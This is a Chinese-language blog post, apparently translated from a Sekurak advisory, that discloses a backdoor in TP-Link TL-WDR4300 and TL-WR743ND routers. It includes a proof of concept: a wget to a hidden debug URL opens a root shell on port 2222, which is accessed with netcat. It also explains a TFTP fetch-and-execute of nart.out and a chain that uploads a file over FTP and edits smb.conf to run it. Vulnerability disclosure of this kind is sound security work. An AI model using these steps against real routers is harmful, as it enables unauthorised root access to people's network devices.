TP-Link路由器后门

原文 http://sekurak.pl/tp-link-httptftp-backdoor

影响版本

  • TL-WDR4300
  • TL-WR743ND(V1.2 V2.0)

概念验证

[code lang="js"]</code>

root@secu:~# nc 192.168.0.1 2222

(UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused

root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html --2013-03-09 23:22:31-- http://192.168.0.1/userRpmNatDebugRpm26525557/start_art .html

Connecting to 192.168.0.1:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: unspecified [text/html]

Saving to: "start_art.html"

&nbsp;

[ <=> ] 426 --.-K/s in 0s

&nbsp;

2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426]

&nbsp;

root@secu:~# nc 192.168.0.1 2222

ps

PID Uid VmSize Stat Command

1 root 404 S init

2 root SW< [kthreadd]

3 root SW< [ksoftirqd/0]

4 root SW< [events/0]

5 root SW< [khelper]

6 root SW< [async/mgr]

7 root SW< [kblockd/0]

8 root SW [pdflush]

9 root SW [pdflush]

10 root SW< [kswapd0]

17 root SW< [mtdblockd]

18 root SW< [unlzma/0]

71 root 2768 S /usr/bin/httpd

76 root 380 S /sbin/getty ttyS0 115200

78 root 208 S ipcserver

82 root 2768 S /usr/bin/httpd

83 root 2768 S /usr/bin/httpd

86 root 732 S ushare -d -x -f /tmp/ushare.conf

92 root 348 S syslogd -C -l 7

96 root 292 S klogd

101 root SW< [napt_ct_scan]

246 root 348 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u

247 root 204 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u

251 root 364 S /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf

286 root 2768 S /usr/bin/httpd

299 root 2768 S /usr/bin/httpd

300 root 2768 S /usr/bin/httpd

305 root 2768 S /usr/bin/httpd

307 root 2768 S /usr/bin/httpd

309 root 2768 S /usr/bin/httpd

310 root 2768 S /usr/bin/httpd

389 root 2768 S /usr/bin/httpd

<code>[/code]

详细信息

在下面的HTTP请求被发送:http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html

的路由器下载一个的文件(nart.out),从主机,issed的http请求并执行的root:

tp-link-diag-400x214

捕获从主机发出的HTTP请求:

wireshark_tmp

Wireshark的过滤器用来显示路由器的TFTP流量

wireshark1

nart.out TFTP请求

ftp1

那个路由器还支持通过USB在FTP上分享文件

ftp2

然后用burpsuite修改上传路径

ftp3

通过查找/tmp目录,发现/tmp/samba/smb.conf 这个文件是有写权限的

ftp5

修改smb.conf 文件,执行刚才上传的/tmp/szel文件,这个路径就是刚才burpsuite抓包修改的

http-server

在httpd模块中,发现对start_art.html进行处理的源代码tftp

所以当访问start_art.html时,就会从主机(192.168.1.100)拷贝nart.out到路由器,并且chmod777再执行


发表评论

(必填)

(必填)

(以便回访)